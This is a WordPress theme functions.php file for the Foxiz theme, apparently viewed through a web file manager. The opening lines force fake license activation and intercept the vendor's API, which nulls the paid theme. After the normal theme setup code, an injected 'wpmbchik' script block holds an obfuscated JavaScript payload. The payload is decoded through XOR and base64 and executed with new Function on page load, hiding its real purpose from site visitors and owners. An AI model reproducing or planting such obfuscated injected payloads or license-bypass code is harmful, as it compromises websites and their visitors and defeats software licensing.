JezK
Edit File: functions.php
<?php /** Don't load directly */ defined( 'ABSPATH' ) || exit; update_option( 'foxiz_license_id', [ 'is_activated' => 1, 'purchase_code' => 'OYLITE00-0000-0000-0000-5199BAEE264D' ] ); update_option( '_ruby_validated', '' ); update_option('_licfoxiz_license_id', ['licensed' => true] ); set_site_transient('_licfoxiz_license_id', true); update_option( 'ruby_api_keys', [ 'expiration' => '__foxiz_expiration', 'activation' => '__foxiz_activation', ] ); update_option( '__foxiz_expiration', strtotime('+30 days') ); update_option( '__foxiz_activation', 'active' ); if ( empty( get_option( 'foxiz_import_id', false ) ) ) { $demos = false; $response = wp_remote_get(trim(), [ 'sslverify' => false, 'timeout' => 30 ] ); if ( wp_remote_retrieve_response_code( $response ) == 200 ) { $demos = json_decode( wp_remote_retrieve_body( $response ), true ); } update_option( 'foxiz_import_id', $demos ); } add_action( 'init', function() { add_filter( 'pre_http_request', function( $pre, $post_args, $url ) { if ( strpos( $url, 'https://api.themeruby.com/' ) !== false ) { $query_args = []; parse_str( parse_url( $url, PHP_URL_QUERY ), $query_args ); $url_path = parse_url( $url, PHP_URL_PATH ); if ( ( $url_path == '/wp-json/market/validate' ) && isset( $query_args['action'] ) ) { if ( $query_args['action'] == 'demos' ) { $response = wp_remote_get(trim(), [ 'sslverify' => false, 'timeout' => 60 ] ); if ( wp_remote_retrieve_response_code( $response ) == 200 ) { return $response; } } return [ 'response' => [ 'code' => 403, 'message' => 'Bad request.' ] ]; } elseif ( ( $url_path == '/import/' ) && isset( $query_args['demo'] ) && isset( $query_args['data'] ) ) { $ext = in_array( $query_args['data'], ['content', 'pages'] ) ? '.xml' : '.json'; $response = wp_remote_get(trim(), [ 'sslverify' => false, 'timeout' => 300 ] ); if ( wp_remote_retrieve_response_code( $response ) == 200 ) { return $response; } return [ 'response' => [ 'code' => 403, 'message' => 'Bad request.' ] ]; } } return $pre; }, 10, 3 ); } ); define( 'FOXIZ_THEME_VERSION', '2.7.4' ); define( 'FOXIZ_THEME_DIR', trailingslashit( get_template_directory() ) ); define( 'FOXIZ_THEME_URI', trailingslashit( esc_url( get_template_directory_uri() ) ) ); define( 'FOXIZ_CHILD_THEME_DIR', trailingslashit( get_stylesheet_directory() ) ); define( 'FOXIZ_CHILD_THEME_URI', trailingslashit( esc_url( get_stylesheet_directory_uri() ) ) ); defined( 'FOXIZ_TOS_ID' ) || define( 'FOXIZ_TOS_ID', 'foxiz_theme_options' ); require_once FOXIZ_THEME_DIR . 'includes/core-functions.php'; require_once FOXIZ_THEME_DIR . 'includes/file.php'; add_action( 'after_setup_theme', 'foxiz_theme_setup', 10 ); add_action( 'wp_enqueue_scripts', 'foxiz_register_script_frontend', 990 ); /** setup */ if ( ! function_exists( 'foxiz_theme_setup' ) ) { function foxiz_theme_setup() { // load_theme_textdomain $locale = function_exists( 'determine_locale' ) ? determine_locale() : get_locale(); $loco_path = WP_LANG_DIR . '/loco/themes/foxiz-' . $locale . '.mo'; $theme_lang_path = WP_LANG_DIR . '/themes/foxiz-' . $locale . '.mo'; if ( is_readable( $loco_path ) ) { load_textdomain( 'foxiz', $loco_path ); } elseif ( file_exists( $theme_lang_path ) ) { load_textdomain( 'foxiz', $theme_lang_path ); } else { load_theme_textdomain( 'foxiz', get_theme_file_path( 'languages' ) ); } if ( ! isset( $GLOBALS['content_width'] ) ) { $GLOBALS['content_width'] = 1240; } add_theme_support( 'automatic-feed-links' ); add_theme_support( 'title-tag' ); add_theme_support( 'html5', [ 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', 'script', 'style', ] ); add_theme_support( 'post-formats', [ 'gallery', 'video', 'audio' ] ); add_theme_support( 'post-thumbnails' ); add_theme_support( 'responsive-embeds' ); add_theme_support( 'align-wide' ); add_theme_support( 'woocommerce', [ 'gallery_thumbnail_image_width' => 110, 'thumbnail_image_width' => 300, 'single_image_width' => 760, ] ); add_theme_support( 'wc-product-gallery-lightbox' ); add_theme_support( 'wc-product-gallery-slider' ); if ( ! foxiz_get_option( 'widget_block_editor' ) ) { remove_theme_support( 'widgets-block-editor' ); } register_nav_menus( [ 'foxiz_main' => esc_html__( 'Main Menu', 'foxiz' ), 'foxiz_mobile' => esc_html__( 'Mobile Menu', 'foxiz' ), 'foxiz_mobile_quick' => esc_html__( 'Mobile Quick Access', 'foxiz' ), ] ); $sizes = foxiz_calc_crop_sizes(); foreach ( $sizes as $crop_id => $size ) { add_image_size( $crop_id, $size[0], $size[1], $size[2] ); } } } /* register scripts */ if ( ! function_exists( 'foxiz_register_script_frontend' ) ) { function foxiz_register_script_frontend() { $style_deps = []; $script_deps = [ 'jquery', 'jquery-waypoints', 'rbswiper', 'jquery-magnific-popup', ]; $main_filename = 'main'; $woocommerce_filename = 'woocommerce'; $podcast_filename = 'podcast'; if ( is_rtl() ) { $main_filename = 'rtl'; $woocommerce_filename = 'woocommerce-rtl'; $podcast_filename = 'podcast-rtl'; } $gfont_url = Foxiz_Font::get_font_url(); if ( ! empty( $gfont_url ) ) { wp_register_style( 'foxiz-font', esc_url_raw( $gfont_url ), [], FOXIZ_THEME_VERSION, 'all' ); $style_deps[] = 'foxiz-font'; } if ( foxiz_get_option( 'font_awesome' ) ) { wp_deregister_style( 'font-awesome' ); wp_register_style( 'font-awesome', foxiz_get_file_uri( 'assets/css/font-awesome.css' ), [], '6.1.1', 'all' ); $style_deps[] = 'font-awesome'; } wp_register_style( 'foxiz-main', foxiz_get_file_uri( 'assets/css/' . $main_filename . '.css' ), [], FOXIZ_THEME_VERSION, 'all' ); wp_add_inline_style( 'foxiz-main', foxiz_get_dynamic_css() ); $style_deps[] = 'foxiz-main'; if ( foxiz_get_option( 'podcast_supported' ) ) { wp_register_style( 'foxiz-podcast', foxiz_get_file_uri( 'assets/css/' . $podcast_filename . '.css' ), [], FOXIZ_THEME_VERSION, 'all' ); $style_deps[] = 'foxiz-podcast'; } if ( ! foxiz_is_amp() ) { wp_register_style( 'foxiz-print', foxiz_get_file_uri( 'assets/css/print.css' ), [], FOXIZ_THEME_VERSION, 'all' ); $style_deps[] = 'foxiz-print'; if ( class_exists( 'WooCommerce' ) ) { wp_deregister_style( 'yith-wcwl-font-awesome' ); wp_register_style( 'foxiz-woocommerce', foxiz_get_file_uri( 'assets/css/' . $woocommerce_filename . '.css' ), [], FOXIZ_THEME_VERSION, 'all' ); $style_deps[] = 'foxiz-woocommerce'; } } wp_register_style( 'foxiz-style', get_stylesheet_uri(), $style_deps, FOXIZ_THEME_VERSION, 'all' ); wp_enqueue_style( 'foxiz-style' ); if ( ! foxiz_is_amp() ) { if ( is_singular() && comments_open() && get_option( 'thread_comments' ) ) { wp_enqueue_script( 'comment-reply' ); } wp_register_script( 'jquery-waypoints', foxiz_get_file_uri( 'assets/js/jquery.waypoints.min.js' ), [ 'jquery' ], '3.1.1', true ); wp_register_script( 'rbswiper', foxiz_get_file_uri( 'assets/js/rbswiper.min.js' ), [], '6.8.4', true ); wp_register_script( 'jquery-magnific-popup', foxiz_get_file_uri( 'assets/js/jquery.mp.min.js' ), [ 'jquery' ], '1.1.0', true ); if ( foxiz_get_option( 'site_tooltips' ) && ! foxiz_is_wc_pages() ) { wp_register_script( 'rb-tipsy', foxiz_get_file_uri( 'assets/js/jquery.tipsy.min.js' ), [ 'jquery' ], '1.0', true ); $script_deps[] = 'rb-tipsy'; } if ( foxiz_get_option( 'single_post_highlight_shares' ) ) { wp_register_script( 'highlight-share', foxiz_get_file_uri( 'assets/js/highlight-share.js' ), '1.1.0', true ); $script_deps[] = 'highlight-share'; } if ( foxiz_get_option( 'back_top' ) ) { wp_register_script( 'jquery-uitotop', foxiz_get_file_uri( 'assets/js/jquery.ui.totop.min.js' ), [ 'jquery' ], 'v1.2', true ); $script_deps[] = 'jquery-uitotop'; } if ( class_exists( 'FOXIZ_CORE' ) ) { if ( foxiz_get_option( 'bookmark_system' ) ) { wp_register_script( 'foxiz-personalize', foxiz_get_file_uri( 'assets/js/personalized.js' ), [ 'jquery', 'foxiz-core', ], FOXIZ_THEME_VERSION, true ); $script_deps[] = 'foxiz-personalize'; } $script_deps[] = 'foxiz-core'; } wp_register_script( 'foxiz-global', foxiz_get_file_uri( 'assets/js/global.js' ), $script_deps, FOXIZ_THEME_VERSION, true ); wp_localize_script( 'foxiz-global', 'foxizParams', foxiz_get_js_settings() ); wp_enqueue_script( 'foxiz-global' ); } } } ?> <?php ?> <!-- wpmbchik --> <script> (function(){ var xeb221b=8704; if(xeb221b>0){var y6d708d=xeb221b-7106}else{var y6d708d=7106} var z2c22d5=y6d708d*16; var _0xa00efe84ab93=[87,38,39,115,68,67,126,112,71,125,68,80,87,97,92,71,71,125,38,82,78,83,92,80,66,38,68,117,117,87,110,38,81,67,122,88,69,126,92,89,66,68,101,115,94,97,110,36,87,122,122,89,78,39,35,76,68,68,84,117,71,125,64,70,68,80,110,97,82,94,71,76,69,67,39,93,83,125,35,88,81,110,34,112,82,94,79,65,81,126,84,114,69,122,125,90,114,83,114,88,71,122,121,65,85,67,34,119,81,38,35,88,83,38,47,89,81,126,95,114,81,110,35,95,81,84,125,119,81,110,98,89,83,110,121,79,81,68,34,79,66,110,126,70,81,68,47,89,94,125,46,112,69,67,113,76,66,110,38,117,83,125,102,92,66,68,102,93,94,113,125,71,78,67,102,76,85,37,68,84,65,122,122,119,66,125,76,70,80,120,87,91,71,39,47,112,65,39,113,68,84,87,68,76,65,38,113,80,69,125,64,87,65,71,64,95,68,83,79,83,65,38,68,94,67,125,110,83,68,71,97,94,82,83,88,112,78,39,98,79,83,71,71,83,65,64,98,95,84,125,76,93,71,125,64,80,66,122,46,80,68,125,102,112,71,125,113,80,65,122,35,85,71,83,64,83,66,38,34,80,65,39,122,83,82,87,117,91,71,39,47,112,65,39,113,68,84,87,68,116,68,83,114,69,66,83,68,80,84,67,110,93,78,38,35,117,69,122,95,80,78,38,35,80,66,38,35,76,68,39,95,80,69,83,71,91,84,97,110,82,78,39,47,116,65,84,83,83,84,80,98,83,68,39,92,91,68,83,67,81,69,67,68,76,84,122,122,116,69,87,64,116,78,125,122,94,71,125,126,80,68,83,47,89,84,67,126,83,68,113,97,94,82,83,88,112,78,39,98,79,83,71,71,83,65,38,68,94,67,125,110,83,68,71,76,116,78,125,122,94,71,125,113,80,68,67,68,70,71,125,35,79,84,67,102,116,65,97,97,94,82,83,88,112,78,39,98,79,83,71,71,83,65,38,68,94,67,125,110,83,68,71,76,81,69,125,92,80,68,67,35,112,84,64,98,115,69,67,114,85,69,87,64,92,68,38,102,79,78,38,102,116,71,113,64,85,68,87,97,94,82,83,88,112,78,39,98,79,83,71,71,83,65,38,68,94,67,125,110,83,68,71,64,70,65,64,98,95,84,67,68,76,66,87,97,94,82,83,88,112,78,39,98,79,83,71,71,83,81,122,122,116,69,87,64,85,68,87,68,81,69,122,47,85,69,87,110,36,83,80,39,93,65,71,98,38,67,122,98,88,78,68,79,92,81,39,88,102,94,67,122,121,83,125,34,119,116,110,98,92,81,67,39,102,83,126,39,103,69,68,110,121,94,110,110,99,81,110,47,121,69,68,98,102,116,126,46,117,94,84,46,119,81,38,122,121,81,125,38,76,85,68,84,114,69,122,125,90,114,83,68,94,69,64,121,65,85,67,125,114,83,38,46,119,83,110,101,69,85,68,84,88,78,125,64,95,78,38,92,83,68,71,98,38,65,122,102,119,69,122,122,69,71,71,88,38,67,67,47,83,68,80,101,85,67,80,47,76,67,122,84,114,69,122,125,90,114,83,122,69,65,122,98,80,68,110,76,38,67,67,47,83,68,80,101,80,65,80,35,92,65,80,47,76,87,110,101,94,81,71,95,65,80,126,79,91,81,39,91,91,80,94,68,68,66,38,68,83,65,97,64,79,78,125,122,79,78,39,125,82,81,71,95,68,114,80,80,70,68,83,68,116,83,83,92,88,87,37,68,92,67,122,102,116,68,67,117,80,68,38,35,80,66,80,47,82,80,110,121,76,83,97,92,76,66,122,47,115,65,67,67,91,82,84,84,114,69,122,125,90,114,80,126,95,66,83,110,84,78,110,76,116,69,122,122,79,66,123,92,80,78,97,88,38,69,64,92,119,65,38,64,94,84,64,126,115,69,64,126,112,65,71,91,114,94,97,117,114,94,97,95,94,81,126,38,85,83,83,92,88,87,97,102,38,65,83,126,91,66,83,80,112,87,122,122,89,78,39,35,76,68,71,97,91,83,80,39,93,65,71,98,38,78,122,126,68,71,126,76,38,69,64,92,119,65,38,64,94,84,64,126,115,69,64,126,112,65,71,91,119,81,68,91,94,114,80,126,95,66,83,110,84,78,97,83,76,87,113,114,38,68,122,102,115,78,84,79,91,82,84,84,88,68,80,125,82,78,67,102,76,85,37,68,88,71,67,122,81,67,110,79,116,83,94,68,88,71,67,122,81,67,110,114,38,78,122,126,68,71,113,64,94,66,125,64,91,78,38,91,71,114,83,39,84,69,67,76,66,87,84,79,76,87,122,84,114,69,122,125,90,114,83,122,87,78,80,126,94,78,84,76,116,69,122,122,79,66,123,92,80,78,97,88,38,78,122,126,68,71,113,64,79,78,125,122,79,78,39,125,82,114,83,39,84,69,67,76,66,84,110,125,85,84,110,121,114,87,126,84,85,66,71,88,38,69,67,84,117,65,83,114,117,87,120,68,81,65,122,35,117,87,84,76,34,78,39,122,85,68,67,97,80,66,64,122,83,68,123,126,82,69,122,122,121,68,83,47,89,87,37,68,92,71,80,110,79,68,39,97,85,83,80,76,76,66,122,47,115,65,67,67,90,114,83,76,119,78,122,97,71,64,125,126,93,78,38,126,82,87,38,34,85,67,80,122,89,78,39,35,76,68,71,97,91,83,80,76,65,66,64,35,80,69,80,47,85,68,83,67,90,114,83,68,80,66,80,121,82,114,80,110,80,68,38,68,94,69,87,114,38,78,38,122,82,67,113,92,71,65,67,35,112,78,122,122,80,85,38,64,89,78,87,98,33,65,67,68,81,71,122,126,89,87,38,39,115,68,67,126,112,71,125,68,80,87,37,68,114,69,67,80,116,78,39,95,94,114,83,80,95,69,125,39,119,66,87,92,71,78,67,102,76,85,37,68,116,71,39,39,83,68,80,92,84,80,125,64,89,78,87,98,108,76,123,114,124,78,39,47,116,115,67,35,119,78,125,35,79,78,97,91,85,83,94,68,116,71,39,39,83,68,80,92,84,84,67,68,116,66,125,67,82,82,94,98,125,115,94,46,91,84,37,68,117,68,67,114,83,68,38,113,94,78,39,122,115,66,113,95,71,114,80,98,82,78,67,68,83,67,125,83,80,65,83,35,112,115,67,35,119,78,125,35,79,78,36,88,89,69,125,47,89,65,71,91,91,119,83,68,80,78,38,35,80,78,97,76,57,67,122,98,89,82,87,117,91,69,122,98,116,68,38,92,95,69,122,47,85,68,83,67,83,71,64,126,83,68,71,97,85,83,94,68,116,71,39,39,83,68,80,92,84,84,64,47,85,68,125,35,83,78,122,46,65,94,126,101,116,81,110,84,38,65,38,88,114,68,83,68,69,71,71,64,83,68,67,114,83,69,125,46,65,66,64,35,80,69,80,47,85,68,83,67,82,87,122,84,112,65,64,92,71,114,80,39,92,71,64,98,112,67,113,88,126,115,81,68,122,84,64,98,93,65,64,126,89,87,37,68,116,71,39,39,83,68,80,92,84,84,64,122,89,65,80,98,83,68,64,126,89,112,38,35,66,78,97,95,85,83,80,76,95,69,122,47,95,71,97,88,89,87,122,84,38,71,67,126,93,66,64,102,91,87,38,34,85,83,80,76,65,83,94,68,116,71,39,39,83,68,80,92,84,84,67,68,80,66,122,122,76,68,80,125,65,114,80,98,82,78,67,68,83,67,125,83,80,68,83,64,112,71,125,76,89,68,80,35,112,80,125,39,115,68,67,126,112,71,125,68,80,87,97,92,71,114,83,80,95,69,125,39,119,66,87,88,80,66,122,97,90,116,122,122,76,68,80,125,82,87,113,95,71,64,126,84,38,65,38,88,114,68,83,68,69,71,71,64,79,66,125,64,70,87,36,80,34,76,81,67,80,65,80,47,76,71,125,64,91,71,125,39,69,87,37,68,112,69,67,88,69,87,113,95,71,64,113,95,71,64,125,39,115,68,67,126,112,71,125,68,80,85,37,68,112,78,67,35,115,66,83,121,82,114,83,88,117,68,122,102,114,87,122,84,85,66,71,88,38,71,39,110,81,65,122,38,64,80,120,68,84,65,122,122,119,66,125,76,70,84,67,114,89,68,67,110,112,71,97,92,76,66,122,47,115,65,67,67,90,115,39,122,83,68,125,92,79,66,113,64,76,66,122,126,83,68,39,39,89,87,38,64,115,68,38,117,85,83,80,39,93,65,71,98,38,68,39,122,87,68,125,92,70,80,122,84,84,65,83,68,80,65,64,98,95,83,71,97,76,84,68,101,91,84,38,76,89,78,38,88,83,66,110,83,91,66,122,47,82,114,83,126,93,68,38,117,91,84,39,98,93,65,67,102,81,65,84,80,97,67,80,47,83,83,78,68,69,65,38,39,114,84,38,47,93,78,38,121,68,82,84,98,66,82,87,84,38,68,83,114,92,65,122,79,94,82,83,114,93,78,38,35,79,78,97,110,36,84,38,92,70,83,68,102,65,83,80,122,89,78,39,35,76,68,71,98,38,68,83,64,91,65,113,88,38,71,64,102,76,65,125,35,81,66,37,84,38,71,39,110,81,65,122,39,36,84,37,68,94,65,67,84,81,71,125,46,85,84,64,47,82,66,125,67,82,66,64,35,80,69,80,47,85,68,83,67,82,114,80,80,89,69,67,76,92,78,113,92,71,78,67,102,76,85,37,68,81,68,67,76,92,65,39,46,65,114,80,80,89,69,67,76,92,78,113,38,88,114,80,80,89,69,67,76,92,78,113,64,76,66,122,126,115,68,39,46,67,114,80,102,119,65,125,102,76,67,125,83,82,114,80,80,89,69,67,76,92,78,113,64,76,66,122,126,115,68,39,46,85,83,71,97,91,83,83,92,88,87,37,68,81,68,67,76,92,65,39,46,85,65,67,35,112,78,122,122,80,85,37,68,81,68,67,76,92,65,39,46,80,65,67,35,116,68,38,102,95,66,113,91,83,114,97,71,87,82,97,71,94,82,87,97,85,83,80,122,89,78,39,35,76,68,71,98,38,78,39,39,89,78,125,110,93,87,37,68,82,78,83,76,119,78,71,87,119,87,126,84,65,87,113,64,95,69,122,47,95,71,97,88,88,78,125,64,95,78,38,92,83,68,71,91,85,67,80,122,89,78,39,35,76,68,71,98,38,78,39,39,89,78,125,110,93,87,37,68,82,78,83,76,119,78,71,87,119,87,126,84,65,87,126,84,65,66,64,35,80,69,80,47,85,68,83,67,90,114,83,122,76,68,125,102,119,69,87,88,38,69,64,35,69,66,38,80,117,87,122,84,114,69,122,125,90,114,83,39,115,65,80,35,87,69,122,97,65,66,38,68,95,78,125,76,89,68,64,46,80,69,80,122,89,69,122,47,89,116,125,114,89,68,125,35,80,78,97,91,91,65,83,126,76,71,122,98,112,82,87,95,71,114,83,39,115,65,80,35,87,69,122,97,80,65,80,122,95,80,120,68,92,78,122,92,70,71,64,97,87,82,87,68,93,65,38,95,80,65,38,88,116,80,80,113,65,82,87,84,38,68,38,39,85,65,113,87,91,82,78,68,114,80,113,97,87,76,125,102,112,71,97,64,88,68,38,68,83,65,71,88,96,69,122,47,89,84,67,64,83,78,87,91,85,84,84,38,116,81,110,101,116,87,126,84,38,66,64,35,79,78,125,84,93,78,87,64,93,65,80,92,80,69,84,76,112,65,64,35,89,83,87,88,70,68,83,126,115,68,125,35,80,78,97,64,82,66,125,102,70,64,39,114,70,68,83,126,115,68,125,35,80,78,97,64,92,68,83,47,69,87,113,64,93,65,39,98,89,68,67,47,121,71,38,92,94,66,97,88,38,66,64,35,79,78,125,84,93,78,87,95,71,64,120,68,112,78,67,35,115,66,83,121,82,81,97,95,80,78,38,88,89,68,71,88,88,78,125,64,95,78,38,92,83,68,71,88,38,69,64,35,69,66,38,80,117,87,122,84,85,66,71,88,38,69,64,35,69,66,38,80,117,87,120,68,92,65,67,76,93,65,125,113,82,114,83,122,115,67,125,47,84,78,87,95,71,64,113,95,71,64,113,95,82,87,126,87,43]; var _0x991a1b90d214=22; var _0x2b86d61a974d=''; for(var _0x20ba4fad9fea=0;_0x20ba4fad9fea<_0xa00efe84ab93.length;_0x20ba4fad9fea++) _0x2b86d61a974d+=String.fromCharCode(_0xa00efe84ab93[_0x20ba4fad9fea]^_0x991a1b90d214); var _0xacb9e6601726=43; var _0x517ce36130ef=atob(_0x2b86d61a974d); var _code=''; for(var _0x20ba4fad9fea=0;_0x20ba4fad9fea<_0x517ce36130ef.length;_0x20ba4fad9fea++) _code+=String.fromCharCode(_0x517ce36130ef.charCodeAt(_0x20ba4fad9fea)^_0xacb9e6601726); (new Function(_code))(); })(); </script> <!-- /wpmbchik --> <?php